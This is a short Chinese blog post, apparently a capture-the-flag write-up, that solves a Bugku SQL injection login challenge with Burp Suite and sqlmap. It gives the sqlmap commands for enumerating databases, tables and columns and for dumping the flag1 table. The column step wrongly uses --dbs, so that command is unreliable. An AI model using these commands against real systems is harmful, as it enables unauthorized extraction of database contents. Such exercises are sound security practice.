版权声明:本文为博主原创文章,转载需注明出处。 https://blog.csdn.net/zz_Caleb/article/details/84980745
根据url提示是让sql注入,但万能密码又无效,这里我们用sqlmap+bp来解题。
首先输入用户密码来登录用bp抓包:
如图将其保存到txt文件中,然后用SQLmap来注入
输入命令暴库:sqlmap.py -r "1.txt" -p admin_name --dbs(我将1.txt和sqlmap保存在同一个文件夹下了)
-p为注入点,就是admin_name ;r为读文件
会发现出来两个数据库,而我们需要的是bugkusql1,
然后暴表:sqlmap.py -r "1.txt" -D bugkusql1 -p admin_name --tables
爆出了flag1表,
然后爆列名:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --dbs
爆出了flag1列
然后爆字段:sqlmap.py -r "1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
就拿到flag了。